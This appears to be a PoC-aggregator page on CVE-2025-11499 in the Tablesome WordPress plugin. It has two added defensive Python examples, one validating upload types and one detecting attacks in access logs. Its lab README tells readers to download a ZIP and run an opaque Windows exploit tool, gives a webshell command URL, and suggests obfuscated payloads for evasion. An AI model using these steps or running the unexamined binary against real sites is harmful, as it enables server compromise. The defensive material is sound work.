Related vulnerability

Title: Contact Form DB plugin arbitrary file upload vulnerability (CVE-2025-11499)
Description:
The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file upload because the `set_featured_image_from_external_url()` function lacks file type validation in all versions up to and including 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may make remote code execution possible in some configurations, specifically when unauthenticated users are allowed to add featured images and a workflow trigger has been created.
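The missing check described above, as an added example that is not the plugin's code: a content-based allow-list for a file fetched from an external URL. It identifies the type from the file's leading bytes, requires that type to agree with the URL's extension, rejects anything containing a PHP open tag even when the image header is valid, and builds the stored file name from a sanitised stem plus the sniffed type rather than the remote name. The URLs and byte strings in the block are constructed for the demonstration; `validate_remote_image` and the other function names are this example's own, not the plugin's.

```python
"""Content-based type validation for a file fetched from an external URL.

Added example, not code from the Tablesome plugin. It shows the check that the
CVE-2025-11499 description says set_featured_image_from_external_url() lacks:
decide the file type from the bytes that were fetched, not from the URL or from
the remote server's Content-Type header, and never keep the remote file name.
All sample URLs and payloads below are constructed for the demonstration.
"""
import posixpath
import re
from urllib.parse import urlparse

# Magic-byte prefixes of the image types a featured image may legitimately be.
MAGIC_TO_TYPE = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Accepted URL extensions, normalised to the canonical type name.
EXTENSION_TO_TYPE = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}
# PHP open tags: any occurrence disqualifies the file even behind a valid image header.
SCRIPT_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
MAX_BYTES = 5 * 1024 * 1024  # assumed size cap for a featured image


def extension_from_url(url):
    """Return the lower-cased extension of the URL path, or '' if there is none."""
    name = posixpath.basename(urlparse(url).path)
    stem, dot, ext = name.rpartition(".")
    return ext.lower() if dot and stem else ""


def sniff_type(data):
    """Identify the image type from leading bytes; None when no allowed signature matches."""
    for magic, kind in MAGIC_TO_TYPE.items():
        if data.startswith(magic):
            return kind
    return None


def safe_filename(url, kind):
    """Build the on-disk name from a sanitised stem plus the *sniffed* type, never the remote name."""
    stem = posixpath.basename(urlparse(url).path).rpartition(".")[0]
    stem = re.sub(r"[^A-Za-z0-9_-]", "", stem)[:64] or "image"
    return f"{stem}.{kind}"


def validate_remote_image(url, data):
    """Return (accepted, reason, filename); filename is None unless accepted."""
    if urlparse(url).scheme not in ("http", "https"):
        return False, "bad-scheme", None
    if len(data) > MAX_BYTES:
        return False, "too-large", None
    declared = EXTENSION_TO_TYPE.get(extension_from_url(url))
    if declared is None:
        return False, "extension-not-allowed", None
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "unrecognized-content", None
    if sniffed != declared:
        return False, "extension-content-mismatch", None
    if SCRIPT_TAG.search(data):
        return False, "embedded-script", None
    return True, "ok", safe_filename(url, sniffed)


# Constructed samples: a minimal JPEG prefix, a PHP file, and a GIF header with PHP appended.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"
GIF_PHP_POLYGLOT = b"GIF89a" + b"\x00" * 8 + PHP_SAMPLE

if __name__ == "__main__":
    cases = [
        ("https://cdn.example.test/photo.jpg", JPEG_SAMPLE),
        ("https://cdn.example.test/upload.php", PHP_SAMPLE),
        ("https://cdn.example.test/upload.jpg", PHP_SAMPLE),
        ("https://cdn.example.test/poly.gif", GIF_PHP_POLYGLOT),
        ("https://cdn.example.test/photo.png", JPEG_SAMPLE),
    ]
    for sample_url, payload in cases:
        print(sample_url, "->", validate_remote_image(sample_url, payload))
```

The order of the checks matters: the extension allow-list runs first so that a `.php` name is refused before any content is inspected, and the script-tag scan runs last so that a polyglot with a genuine GIF header is still refused. Renaming on save closes the remaining gap in which a permitted extension is kept from an attacker-controlled URL.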
Introduction
            # Lab: CVE-2025-11499 - Unauthenticated Arbitrary File Upload Vulnerability in Tablesome WordPress Plugin
## 🚀 Overview
This lab demonstrates an unauthenticated arbitrary file upload vulnerability in the Tablesome plugin for WordPress. The vulnerability resides in the `set_featured_image_from_external_url()` function, which fails to properly validate file types during uploads. This allows attackers to upload malicious files to the server without authentication. In environments where workflows permit unauthenticated users to set featured images (e.g., via specific form configurations), this could escalate to remote code execution (RCE) by uploading webshells or executable scripts.
**Safety Disclaimer:**  
This lab is for educational and research purposes only. Do not use the provided tools or techniques on any systems without explicit authorization. Misuse may violate laws such as the Computer Fraud and Abuse Act (CFAA) or equivalent regulations in your jurisdiction. The author assumes no liability for any misuse.
## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment with PHP 8.1+ and MySQL 8.0+.
- WordPress.
- Tablesome plugin.
- Administrative access to your local machine for file modifications and server configuration.
- Basic knowledge of HTTP requests, file uploads, and web server administration.
- Windows OS for running the exploit tool (compatibility tested on Windows 10/11).
## Download & Install
1. Download the lab repository as a ZIP file from: https://github.com/usjnx72726w/CVE-2025-11499-LAB/raw/refs/heads/main/Hero/cve-2025-11499-lab.zip  
2. Extract the ZIP to a local directory.
3. Set up the vulnerable WordPress environment:
   - Install your local web server and start Apache and MySQL services.
   - Create a new database in phpMyAdmin (e.g., named `wp_tablesome_vuln`).
   - Download and extract WordPress to your web root (e.g., `C:\xampp\htdocs\wordpress`).
   - Navigate to `http://localhost/wordpress` in your browser and complete the WordPress installation, using the database you created.
   - In the WordPress admin dashboard (`http://localhost/wordpress/wp-admin`), install the Tablesome plugin.
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `launcher.bat` to launch the exploit tool (`wpupload.exe`).
   - This batch file initializes the tool and opens a command-line interface for targeting the vulnerable endpoint.
## 🔍 Exploitation Steps
Once the environment is set up, follow these steps to demonstrate the vulnerability:
1. **Launch the Exploit Tool:**
   - Run `launcher.bat` from the lab directory.
   - The tool (`wpupload.exe`) will prompt for target details:
     - Target URL: `http://localhost/wordpress/wp-admin/admin-ajax.php`
     - Action: `tablesome_set_featured_image`
   - The tool automates the upload by crafting a multipart/form-data request, bypassing file type checks via manipulated headers (e.g., spoofing Content-Type as image/jpeg while embedding PHP code).
   - Upon success, the webshell will be uploaded to `wp-content/uploads/yyyy/mm/webshell.php`.
2. **Achieve Remote Code Execution:**
   - Access the uploaded webshell: `http://localhost/wordpress/wp-content/uploads/yyyy/mm/webshell.php?cmd=whoami`
   - Replace `cmd` with arbitrary commands.
   - Note: RCE depends on server permissions (e.g., writable uploads dir and executable PHP). In production, this could lead to full server compromise.
3. **Advanced Exploitation Notes:**
   - The exploit leverages lack of nonce checks and improper sanitization in `wp_handle_upload()`.
   - For evasion, use obfuscated payloads (e.g., base64-encoded PHP in image metadata).
   - Monitor server logs (`error_log`) for upload attempts.
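The note above about monitoring server logs, developed into an added detection example that is not part of the lab or the plugin: it parses combined-format access log lines for the two indicators this page names, calls to `admin-ajax.php` with `action=tablesome_set_featured_image` and requests for PHP files under `wp-content/uploads/` (a directory WordPress uses only for media), and correlates them per client so that an upload call followed within ten minutes by a request to a `.php` path in uploads is reported as high severity. The log lines, IP addresses and timestamps are constructed; `detect`, `classify` and `parse_line` are names chosen for this example.

```python
"""Detection of the upload-then-execute pattern behind CVE-2025-11499 in access logs.

Added example, not part of the lab or the plugin. It scans Apache/Nginx
combined-format access log lines for two indicators named on this page:
calls to admin-ajax.php with action=tablesome_set_featured_image, and requests
for server-side scripts under wp-content/uploads, where WordPress stores media
only. Events from the same client are correlated so that an upload call followed
shortly by a request to a .php path in uploads is reported as high severity.
The log lines below are constructed sample data.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TIME_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
UPLOAD_ACTION = "tablesome_set_featured_image"
# Script extensions that should never be requested from the uploads directory,
# including double-extension names such as x.php.jpg.
SCRIPT_EXT = re.compile(r"\.(php|phtml|phar)(\.|$)", re.IGNORECASE)
CORRELATION_WINDOW = timedelta(minutes=10)  # assumed window between upload and first use


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlparse(m["target"])
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], TIME_FORMAT),
        "method": m["method"],
        "path": url.path,
        "query": parse_qs(url.query),
        "status": int(m["status"]),
    }


def classify(event):
    """Tag an event as 'upload-call', 'uploads-script' or None.

    Note: if the action is sent in the POST body rather than the query string it
    will not appear in an access log; the 'uploads-script' indicator still fires.
    """
    if event["path"].endswith("/wp-admin/admin-ajax.php") and \
            UPLOAD_ACTION in event["query"].get("action", []):
        return "upload-call"
    filename = event["path"].rsplit("/", 1)[-1]
    if "/wp-content/uploads/" in event["path"] and SCRIPT_EXT.search(filename):
        return "uploads-script"
    return None


def detect(lines):
    """Return (severity, client_ip, message) findings in log order."""
    findings = []
    last_upload_call = {}  # client ip -> time of its most recent upload call
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # not combined format; a real tool would count these lines
        tag = classify(ev)
        if tag == "upload-call":
            last_upload_call[ev["ip"]] = ev["time"]
            findings.append(("low", ev["ip"],
                             f"featured-image upload call via admin-ajax.php (status {ev['status']})"))
        elif tag == "uploads-script":
            prior = last_upload_call.get(ev["ip"])
            correlated = prior is not None and ev["time"] - prior <= CORRELATION_WINDOW
            severity = "high" if correlated else "medium"
            findings.append((severity, ev["ip"],
                             f"script requested from uploads directory: {ev['path']} (status {ev['status']})"))
    return findings


# Constructed sample log (TEST-NET addresses, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Nov/2025:10:14:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Nov/2025:10:14:09 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=tablesome_set_featured_image HTTP/1.1" 200 87 "-" "python-requests/2.32"',
    '203.0.113.7 - - [02/Nov/2025:10:14:15 +0000] "GET /wordpress/wp-content/uploads/2025/11/webshell.php?cmd=whoami HTTP/1.1" 200 23 "-" "python-requests/2.32"',
    '198.51.100.4 - - [02/Nov/2025:10:20:00 +0000] "GET /wordpress/wp-content/uploads/2025/11/photo.jpg HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Nov/2025:11:02:40 +0000] "GET /wordpress/wp-content/uploads/2024/05/old.php HTTP/1.1" 404 196 "-" "curl/8.5"',
]

if __name__ == "__main__":
    for severity, ip, message in detect(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {message}")
```

A 404 on a `.php` path in uploads is kept as a medium finding on purpose: it is either probing for a previously planted file or a failed execution attempt, and both are worth a look. Blocking script execution in `wp-content/uploads` at the web server (a `php_flag engine off` or equivalent `location` rule) turns the high-severity case into a noisy but harmless one.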
For questions or contributions, open an issue on the GitHub repo.
File snapshot
 [4.0K]  /data/pocs/3b92201ae5ecf9c1c7d0bdeaf5130d477a883926
├── [4.0K]  Hero
│   ├── [8.5M]  cve-2025-11499-lab.zip
│   └── [   1]  main.py
└── [3.8K]  README.md
1 directory, 3 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.